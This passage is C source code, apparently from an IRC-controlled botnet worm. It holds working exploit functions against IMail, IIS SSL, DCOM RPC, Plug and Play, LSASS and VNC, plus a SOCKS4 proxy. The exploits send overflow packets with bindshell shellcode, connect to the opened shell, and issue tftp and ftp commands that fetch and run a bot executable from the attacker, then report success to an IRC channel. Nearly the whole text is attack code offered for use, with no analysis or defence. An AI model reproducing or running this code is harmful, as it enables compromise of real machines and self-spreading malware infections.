8.12")) iRemoteTarget = 13; else if (strstr(szBanner,"IMail 8.13")) iRemoteTarget = 14; else if (strstr(szBanner,"IMail 8.14")) iRemoteTarget = 14; else if (strstr(szBanner,"IMail 8.15")) iRemoteTarget = 15; else iRemoteTarget = -1; if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Banner for %s is %s, iRemoteTarget is %d",exinfo.ip,szBanner,iRemoteTarget);Sleep(1500); memcpy(szImailPacket + 12, bindshell, ibindsize -1); if (iRemoteTarget == -1) return FALSE; if (pImailTargets[iRemoteTarget].iSEHAddress == 0) memcpy(szImailPacket + 700, &pImailTargets[iRemoteTarget].lOffset, 4); else if (pImailTargets[iRemoteTarget].iSEHAddress == 1) memcpy(szImailPacket + 692, &pImailTargets[iRemoteTarget].lOffset, 4); if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Crafting Malicious Packet for %s",exinfo.ip);Sleep(1500); if(fsend(sSocket, szImailPacket, sizeof(szImailPacket), 0) == SOCKET_ERROR) return FALSE; if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Malicious packet for %s sent",exinfo.ip);Sleep(1500); fclosesocket(sSocket); if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Socket Closed for %s",exinfo.ip);Sleep(1500); if (ConnectShell(exinfo,bindport)) { if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); exploit[exinfo.exploit].stats++; } else if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); return FALSE; }
BOOL IIS5SSL(EXINFO exinfo) { char buffer[IRCLINE]; char request[]="\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00"; unsigned long XOR=0xffffffff; unsigned long offsets[] = { 0x6741a1cd, // Win2K SP0 0x6741a199, // Win2K SP1 0x6741a426, // Win2K SP2 0x67419e1d, // Win2K SP3 0x67419ce8, // Win2K SP4 0x0ffb7de9, // WinXP SP0 0x0ffb832f // WinXP SP1 }; BOOL bRet = FALSE; unsigned char *badbuffer=(unsigned char*)malloc(347); memset(badbuffer, 0, 347); unsigned char *p=badbuffer; memcpy(p, request, sizeof(request)); p+=sizeof(request)-1; strcat((char*)p, jumper); strcat((char*)p, bind_shell_code); SOCKET sSock; if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) { SOCKADDR_IN ssin; // FIX ME: since i didnt found a way to determine the remote OS, i // placed this all together in a loop. this aint the best way // i'm sure about that for (int i=0; i < (sizeof(offsets) / sizeof(LPTSTR)); i++) { memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons(exinfo.port); if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) { offsets[i]^=XOR; strncat((char*)p, (char*)&offsets[i], 4); strcat((char*)p, shellcode); if (fsend(sSock, (char *)&badbuffer, strlen((char *)&badbuffer), 0)) { Sleep(1000); fclosesocket(sSock); memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_addr.s_addr = finet_addr(exinfo.ip); ssin.sin_port = fhtons(1981); if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin))) { char cmd_buff[400]; #ifndef NO_TFTPD _snprintf(cmd_buff, sizeof (cmd_buff), "tftp -i %s get %s\r\n", GetIP(exinfo.sock),filename, filename); #endif #ifndef NO_FTPD _snprintf(cmd_buff, sizeof (cmd_buff), "echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n", GetIP(exinfo.sock),FTP_PORT); #endif if(frecv(exinfo.sock, buffer, sizeof(buffer), 0) > 0) { Sleep(500); if(fsend(sSock,(char*)cmd_buff, strlen(cmd_buff),0) > 0) { fclosesocket(sSock); bRet = TRUE; _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); break; } } } } } fclosesocket(sSock); } } return (bRet); }
DWORD WINAPI Socks4ClientThread(LPVOID param) { SOCKS4 socks4 = *((SOCKS4 *)param); SOCKS4 *socks4p = (SOCKS4 *)param; socks4p->cgotinfo = TRUE; int threadnum = socks4.cthreadnum; SOCKS4HEADER hdr; TIMEVAL timeout; timeout.tv_sec = 5; timeout.tv_usec = 0; fd_set fd; FD_ZERO(&fd); FD_SET(threads[threadnum].sock, &fd); if (fselect(0, &fd, NULL, NULL, &timeout) == 0) { fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } if (frecv(threads[threadnum].sock, (char *)&hdr, sizeof(hdr), 0) <= 0) { fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } if (hdr.vn != 4 || hdr.cd != SOCKS4_CONNECT) { fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } // FIX ME: do a userid (hdr.userid) check here if you wish to use simple auth (needs testing) if (socks4.userid[0] != '\0') { if (strcmp(hdr.userid, socks4.userid) != 0) { addlogv("[SOCKS4]: Authentication failed. Remote userid: %s != %s.", hdr.userid, socks4.userid); hdr.vn = 0; hdr.cd = SOCKS4_REJECT_USERID; memset(&hdr.userid, 0, 1024); fsend(threads[threadnum].sock, (char *)&hdr, 8, 0); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } } SOCKADDR_IN tsin; memset(&tsin, 0, sizeof(tsin)); tsin.sin_family = AF_INET; tsin.sin_port = hdr.destport; tsin.sin_addr.s_addr = hdr.destaddr; SOCKET tsock; if ((tsock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) { addlogv("[SOCKS4]: Error: Failed to open socket(), returned: <%d>.", fWSAGetLastError()); hdr.vn = 0; hdr.cd = SOCKS4_REJECT; memset(&hdr.userid, 0, 1024); fsend(threads[threadnum].sock, (char *)&hdr, 8, 0); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } if (fconnect(tsock, (LPSOCKADDR)&tsin, sizeof(tsin)) == SOCKET_ERROR) { addlogv("[SOCKS4]: Error: Failed to connect to target, returned: <%d>.", fWSAGetLastError()); hdr.vn = 0; hdr.cd = SOCKS4_REJECT; memset(&hdr.userid, 0, 1024); fsend(threads[threadnum].sock, (char *)&hdr, 8, 0); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); } hdr.vn = 0; hdr.cd = SOCKS4_GRANT; memset(&hdr.userid, 0, 1024); fsend(threads[threadnum].sock, (char *)&hdr, 8, 0); TransferLoop(tsock, threads[threadnum].sock); fclosesocket(tsock); fclosesocket(threads[threadnum].sock); clearthread(threadnum); ExitThread(0); }
BOOL dcom(EXINFO exinfo) { char sendbuf[IRCLINE]; if (exinfo.port == 445) { NETRESOURCEW nr; if (!ConnectViaNullSession(exinfo.ip, &nr)) return FALSE; else { char szPipePath[MAX_PATH]; sprintf(szPipePath, "\\\\%s\\pipe\\epmapper", exinfo.ip); HANDLE hFile = CreateFile(szPipePath, GENERIC_WRITE | GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile == INVALID_HANDLE_VALUE) { CloseNullSession(exinfo.ip); return FALSE; } // sprintf(sendbuf, "[dcom]: Connected to pipe \\\\%s\\pipe\\epmapper", exinfo.ip); // irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); int TargetOS = FpHost(exinfo.ip, FP_PORT5K); // get shellcode DWORD reqbufsize; char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, TRUE); if (!reqbuf) { CloseHandle(hFile); CloseNullSession(exinfo.ip); return FALSE; } unsigned long lWritten; char *szInBuf = (char *)malloc(100000); memset(szInBuf, 0, 100000); // send the bind string DWORD dwRead; TransactNamedPipe(hFile, bindstr, sizeof(bindstr)-1, szInBuf, 10000, &dwRead, NULL); if (szInBuf[2] != 0x0C) { free(szInBuf); free(reqbuf); CloseHandle(hFile); CloseNullSession(exinfo.ip); return FALSE; } // send the evil request if (!WriteFile(hFile, reqbuf, reqbufsize, &lWritten, 0)) { free(szInBuf); free(reqbuf); CloseHandle(hFile); CloseNullSession(exinfo.ip); return FALSE; } BOOL Result = ReadFile(hFile, szInBuf, 10000, &dwRead, NULL); free(reqbuf); free(szInBuf); CloseHandle(hFile); CloseNullSession(exinfo.ip); if (Result == TRUE) { return FALSE; } } } else { // port 135 and others int TargetOS = FpHost(exinfo.ip, FP_RPC); if (TargetOS == OS_WINNT) return FALSE; // get a funky fresh socket SOCKET sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP); if (sSocket == SOCKET_ERROR) return FALSE; // fill in sockaddr and resolve the host SOCKADDR_IN ssin; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)exinfo.port); ssin.sin_addr.s_addr = finet_addr(exinfo.ip); // get shellcode DWORD reqbufsize; char *reqbuf = CreateDCOMRequestPacket(exinfo, &reqbufsize, TargetOS, FALSE); if (!reqbuf) { fclosesocket(sSocket); return FALSE; } // connect to the server int iErr = fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)); if (iErr == -1) { // connect failed, exit free(reqbuf); fclosesocket(sSocket); return FALSE; } // send the bind string if (fsend(sSocket, bindstr, sizeof(bindstr)-1, 0) == SOCKET_ERROR) { free(reqbuf); fclosesocket(sSocket); return FALSE; } // read reply char recvbuf[4096]; frecv(sSocket, recvbuf, 4096, 0); // Send the evil request if (fsend(sSocket, reqbuf, reqbufsize, 0) == SOCKET_ERROR) { free(reqbuf); fclosesocket(sSocket); return FALSE; } // read reply if (frecv(sSocket, recvbuf, 4096, 0) == SOCKET_ERROR) { free(reqbuf); fclosesocket(sSocket); return FALSE; } free(reqbuf); // Close the socket fclosesocket(sSocket); } sprintf(sendbuf,"[TFTP]: File transfer complete to IP: %s", exinfo.ip); for (int i=0; i < 6; i++) { if (searchlog(sendbuf)) { sprintf(sendbuf, "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, sendbuf, exinfo.notice); addlog(sendbuf); exploit[exinfo.exploit].stats++; break; } Sleep(5000); } return TRUE; }
BOOL scvx(char *target, void* conn,EXINFO exinfo) { IRC* irc=(IRC*)conn; SOCKET sockfd; // int gport; int len, len1, TargetOS; unsigned short port = 135; char *buf1="0x001"; char *buf2="0x001"; char lport[] = "\x00\xFF\xFF\x8b"; struct sockaddr_in their_addr; unsigned short tport; unsigned char *sc; TargetOS = FpHost(exinfo.ip, FP_SMB); if (TargetOS == OS_WIN2K3) { //type = 0; // gport=fhtons(bindport); // memcpy(&lport[1], &gport, 2); // *(long*)lport = *(long*)port^0x9432BF80; // memcpy(&sc[471],&lport,4); tport=fhtons(bindport)^(USHORT)0x9999; memcpy(&bindshell[176],&tport,2); sc=(unsigned char *)bindshell; // memcpy(sc+36, (unsigned char *) &dcomtargets[type].ret, 4); their_addr.sin_family = AF_INET; their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); their_addr.sin_port = fhtons(port); if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE; if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(their_addr)) == SOCKET_ERROR) return FALSE; len=strlen((const char*)sc); memcpy(buf2,fcr,sizeof(fcr)); len1=sizeof(fcr); *(unsigned long *)(mmps)=*(unsigned long *)(mmps)+strlen((const char*)sc)/2; *(unsigned long *)(svcd+8)=*(unsigned long *)(svcd+8)+strlen((const char*)sc)/2; memcpy(buf2+len1,mmps,sizeof(mmps)); len1=len1+sizeof(mmps); memcpy(buf2+len1,sc,strlen((const char*)sc)); len1=len1+strlen((const char*)sc); memcpy(buf2+len1,sc1,sizeof(sc1)); len1=len1+sizeof(sc1); memcpy(buf2+len1,svcd,sizeof(svcd)); len1=len1+sizeof(svcd); *(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+strlen((const char*)sc)-0xc; *(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+strlen((const char*)sc)-0xc; *(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+strlen((const char*)sc)-0xc; *(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+strlen((const char*)sc)-0xc; *(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+strlen((const char*)sc)-0xc; *(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+strlen((const char*)sc)-0xc; *(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+strlen((const char*)sc)-0xc; *(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+strlen((const char*)sc)-0xc; if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE; len=frecv(sockfd, buf1, 1000, 0); if (fsend(sockfd,buf2,len1,0)== -1) return FALSE; fclosesocket(sockfd); Sleep(2000); if (ConnectShell(exinfo,bindport)) { if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); exploit[exinfo.exploit].stats++; } else { if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); } } return TRUE; }
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum ) { SOCKADDR_IN addr; int len; int sockfd; unsigned short smblen; char tmp[1024]; unsigned char packet[4096]; unsigned char *ptr; char recvbuf[4096]; IRC* irc=(IRC*)conn; BOOL success=FALSE; char* thisTarget; int pnpbindsize=405; int TargetOS, Target; char* tOS=""; WSADATA wsa; fWSAStartup(MAKEWORD(2,0), &wsa); if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE; thisTarget = exinfo.ip; TargetOS=FpHost(thisTarget,FP_NP); if (TargetOS==OS_UNKNOWN) TargetOS=FpHost(thisTarget,FP_SMB); if (TargetOS == OS_WINNT){ Target=OS_WINNT; success=FALSE; }else if (TargetOS==OS_WINXP){ Target=OS_WINXP; success=FALSE; }else if (TargetOS==OS_WIN2K){ Target=OS_WIN2K; success=TRUE; }else{ success=FALSE; } ZeroMemory(&addr,sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = finet_addr(thisTarget); addr.sin_port = fhtons((unsigned short)exinfo.port); if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE; if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if (len <= 10) return FALSE; if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf(tmp,"\\\\%s\\IPC$",thisTarget); convert_name((char *)ptr, tmp); smblen = strlen(tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE; len = frecv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) return FALSE; // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // Start prepare header -- dETOX mod -- memcpy(RPC_call + 260, Offsets[OffNum], 4); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode unsigned short port; port = fhtons(bindport)^(USHORT)0x9999; memcpy(&bindshell[176],&port,2); memcpy(ptr,bindshell,pnpbindsize-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE; frecv(sockfd, recvbuf, 4096, 0); if (!exinfo.silent && exinfo.verbose){ switch(Target){ case 1: tOS="WINNT"; break; case 2: tOS="WIN2K"; break; case 3: tOS="WINXP"; break; default: tOS="UNKNOWN/2K3/LINUX"; break; } irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip); } // if(success){ Sleep(2000); if (ConnectShell(exinfo,bindport)) { if (!exinfo.silent) irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); exploit[exinfo.exploit].stats++; } else if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip); // } return TRUE; }
BOOL VNCScanner(EXINFO exinfo) { char buffer[IRCLINE]; char szClientPacket[] = "\x01"; struct sockaddr_in thataddr; int res; SOCKET m_sock; m_sock = fsocket(PF_INET, SOCK_STREAM, 0); if (m_sock == INVALID_SOCKET) { fclosesocket(m_sock); return FALSE; } thataddr.sin_addr.s_addr = finet_addr(exinfo.ip); thataddr.sin_family = AF_INET; thataddr.sin_port = fhtons((unsigned short)exinfo.port); res = fconnect(m_sock, (LPSOCKADDR) &thataddr, sizeof(thataddr)); if (res == SOCKET_ERROR) { fclosesocket(m_sock); return FALSE; } //connected //now lets negotiate protocol rfbProtocolVersionMsg pv; if (!ReadExact(m_sock, pv, sz_rfbProtocolVersionMsg)) { closesocket(m_sock); return FALSE; } pv[sz_rfbProtocolVersionMsg] = 0; int m_majorVersion, m_minorVersion; if (sscanf(pv,rfbProtocolVersionFormat,&m_majorVersion,&m_minorVersion) != 2) { closesocket(m_sock); return FALSE; } if (!(m_majorVersion == 3) && !(m_minorVersion == 8)) { //Server is not 3.8 closesocket(m_sock); return FALSE; } if (!WriteExact(m_sock, pv, sz_rfbProtocolVersionMsg)) { closesocket(m_sock); return FALSE; } //auth part CARD32 authScheme, authResult; // CARD8 challenge[CHALLENGESIZE]; //we expect to get 2 bytes if (!ReadExact(m_sock, (char *)&authScheme, 2)) { closesocket(m_sock); return FALSE; } //return clientpacket if (!WriteExact(m_sock, szClientPacket, 1)) { closesocket(m_sock); return FALSE; } if (ReadExact(m_sock, (char *) &authResult, 4)) { authResult = Swap32IfLE(authResult); switch (authResult) { case rfbVncAuthOK: { rfbServerInitMsg m_si; //send non-shared session request and receive data if (WriteExact(m_sock, (char *) useShared, sz_rfbClientInitMsg) && ReadExact(m_sock, (char *) &m_si, sz_rfbServerInitMsg)) { //lets get desktop name m_si.framebufferWidth = Swap16IfLE(m_si.framebufferWidth); m_si.framebufferHeight = Swap16IfLE(m_si.framebufferHeight); m_si.format.redMax = Swap16IfLE(m_si.format.redMax); m_si.format.greenMax = Swap16IfLE(m_si.format.greenMax); m_si.format.blueMax = Swap16IfLE(m_si.format.blueMax); m_si.nameLength = Swap32IfLE(m_si.nameLength); TCHAR *m_desktopName; m_desktopName = new TCHAR[m_si.nameLength + 2]; ReadString(m_sock, m_desktopName, m_si.nameLength); _snprintf(buffer, sizeof(buffer), "VNC%d.%d %s: %s - [AuthBypass]", m_majorVersion, m_minorVersion, m_desktopName, exinfo.ip); irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; closesocket(m_sock); return TRUE; } break; } default: { break; } } } closesocket(m_sock); return FALSE; }
BOOL lsasscb(EXINFO exinfo) { int len; SOCKET sockfd; BOOL success = FALSE; char recvbuf[1600]; SOCKADDR_IN their_addr; memset(&their_addr, 0, sizeof(their_addr)); { their_addr.sin_family = AF_INET; their_addr.sin_addr.s_addr = finet_addr(exinfo.ip); // = *((LPIN_ADDR) * lpHostEntry->h_addr_list); /* ^ Server's address */ their_addr.sin_port = fhtons((unsigned short)exinfo.port); /* connect to the server */ if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE; if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(their_addr)) == SOCKET_ERROR) return FALSE; if (fsend(sockfd, req1, sizeof(req1)-1, 0) == -1) return FALSE; len = frecv(sockfd, recvbuf, 1600, 0); if (fsend(sockfd, req2, sizeof(req2)-1, 0) == -1) return FALSE; len = frecv(sockfd, recvbuf, 1600, 0); if (fsend(sockfd, req3, sizeof(req3)-1, 0) == -1) return FALSE; len = frecv(sockfd, recvbuf, 1600, 0); switch (recvbuf[68]) { case '1': // win XP Exploit2CB( exinfo, sockfd, 0 ); if (Exploit2CB( exinfo, sockfd, 0 )) success = TRUE; break; case '0': //win 2k if (!Exploit2CB( exinfo, sockfd, 2 )) { if (Exploit2CB( exinfo, sockfd, 1)) success = TRUE; } else { success = TRUE; } break; default: return FALSE; } } fclosesocket(sockfd); if (success) { //_snprintf(buffer, sizeof(buffer), "-\x03\x34\2lsass cb\2\x03- exploiting %s...", exploit[exinfo.exploit].name, exinfo.ip); //if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); //addlog(buffer); exploit[exinfo.exploit].stats++; } return TRUE; }
BOOL lsass2(EXINFO exinfo) { int i, targetx, len, targetxOS; char hostipc[40]; char hostipc2[40*2]; char buf[LEN+1]; char sendbuf[(LEN+1)*2]; char req4u[sizeof(reqx4)+20]; char screq[BUFSIZE+sizeof(reqx7)+1500+440]; char screq2k[4348+4060]; char screq2k2[4348+4060]; char recvbuf[1600]; char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4"; char strBuffer[BUFSIZE]; char buffer[IRCLINE], cmd_buff[400]; char smblen; char unclen; unsigned short port; SOCKET sSocket, bSocket; SOCKADDR_IN ssin, bsin; targetxOS = FpHost(exinfo.ip, FP_RPC); if ((targetxOS == OS_UNKNOWN) || (targetxOS == OS_WINNT)) return FALSE; if (targetxOS == OS_WINXP) targetx = 0; else if (rand() % 10) targetx = 1; else targetx = 2; _snprintf(hostipc, sizeof(hostipc),"\\\\%s\\ipc$", exinfo.ip); for (i=0; i<40; i++) { hostipc2[i*2] = hostipc[i]; hostipc2[i*2+1] = 0; } memcpy(req4u, reqx4, sizeof(reqx4)-1); memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2); memcpy(req4u+47+strlen(hostipc)*2, reqx4+87, 9); smblen = 52+(char)strlen(hostipc)*2; memcpy(req4u+3, &smblen, 1); unclen = 9 + (char)strlen(hostipc)*2; memcpy(req4u+45, &unclen, 1); port = fhtons(LSASS_BSPORT)^(USHORT)0x9999; memcpy(&bindshell[176], &port, 2); if ((targetx == 1) || (targetx == 2)) { memset(buf, NOP, LEN); //memcpy(&buf[2020], "\x3c\x12\x15\x75", 4); memcpy(&buf[2020], &ttargetx[targetx].jmpaddr, 4); memcpy(&buf[2036], &bindshell, strlen(bindshell)); memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4); memcpy(&buf[2844], &ttargetx[targetx].jmpaddr, 4); // jmp ebx addr //memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr memcpy(&buf[2856], &bindshell, strlen(bindshell)); for (i=0; i<LEN; i++) { sendbuf[i*2] = buf[i]; sendbuf[i*2+1] = 0; } sendbuf[LEN*2]=0; sendbuf[LEN*2+1]=0; memset(screq2k, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2); memset(screq2k2, 0x31, (BUFSIZE+sizeof(reqx7)+1500)*2); } else { memset(strBuffer, NOP, BUFSIZE); memcpy(strBuffer+160, bindshell, strlen(bindshell)); memcpy(strBuffer+1980, strasm, strlen(strasm)); *(long *)&strBuffer[1964]=ttargetx[targetx].jmpaddr; } memset(screq, 0x31, BUFSIZE+sizeof(reqx7)+1500); if ((sSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_IP)) == SOCKET_ERROR) return FALSE; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = fhtons((unsigned short)exinfo.port); ssin.sin_addr.s_addr = finet_addr(exinfo.ip); if (fconnect(sSocket, (LPSOCKADDR)&ssin, sizeof(ssin)) == -1) { fclosesocket(sSocket); return FALSE; } if (fsend(sSocket, reqx1, sizeof(reqx1)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, reqx2, sizeof(reqx2)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, reqx3, sizeof(reqx3)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, req4u, smblen+4, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, reqx5, sizeof(reqx5)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, reqx6, sizeof(reqx6)-1, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if ((targetx == 1) || (targetx == 2)) { memcpy(screq2k, reqx8, sizeof(reqx8)-1); memcpy(screq2k+sizeof(reqx8)-1, sendbuf, (LEN+1)*2); memcpy(screq2k2, reqx9, sizeof(reqx9)-1); memcpy(screq2k2+sizeof(reqx9)-1, sendbuf+4348-sizeof(reqx8)+1, (LEN+1)*2-4348); memcpy(screq2k2+sizeof(reqx9)-1+(LEN+1)*2-4348-sizeof(reqx8)+1+206, shitx3, sizeof(shitx3)-1); if (fsend(sSocket, screq2k, 4348, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } len = frecv(sSocket, recvbuf, 1600, 0); if (fsend(sSocket, screq2k2, 4060, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } } else { memcpy(screq, reqx7, sizeof(reqx7)-1); memcpy(screq+sizeof(reqx7)-1, &strBuffer[0], BUFSIZE); memcpy(screq+sizeof(reqx7)-1+BUFSIZE, shitx1, 9*16); screq[BUFSIZE+sizeof(reqx7)-1+1500-304-1] = 0; if (fsend(sSocket, screq, BUFSIZE+sizeof(reqx7)-1+1500-304, 0) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } } len = frecv(sSocket, recvbuf, 1600, 0); if ((bSocket = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) { fclosesocket(sSocket); return FALSE; } memset(&bsin, 0, sizeof(bsin)); bsin.sin_family = AF_INET; bsin.sin_port = fhtons(LSASS_BSPORT); bsin.sin_addr.s_addr = finet_addr(exinfo.ip); if (fconnect(bSocket, (LPSOCKADDR)&bsin, sizeof(bsin)) == -1) { fclosesocket(sSocket); fclosesocket(bSocket); return FALSE; } if (frecv(bSocket, recvbuf, 1600, 0) > 0) { Sleep(500); _snprintf(cmd_buff, sizeof(cmd_buff), // "tftp -i %s get %s&%s&exit\n", GetIP(exinfo.sock), filename, filename); "echo open %s %d > o&echo user 1 1 >> o &echo get bling.exe >> o &echo quit >> o &ftp -n -s:o &bling.exe\r\n", GetIP(exinfo.sock),FTP_PORT); if (fsend(bSocket, cmd_buff, strlen(cmd_buff), 0) == SOCKET_ERROR) { fclosesocket(sSocket); fclosesocket(bSocket); return FALSE; } fclosesocket(sSocket); fclosesocket(bSocket); _snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip); if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice); addlog(buffer); exploit[exinfo.exploit].stats++; return TRUE; } else return FALSE; }
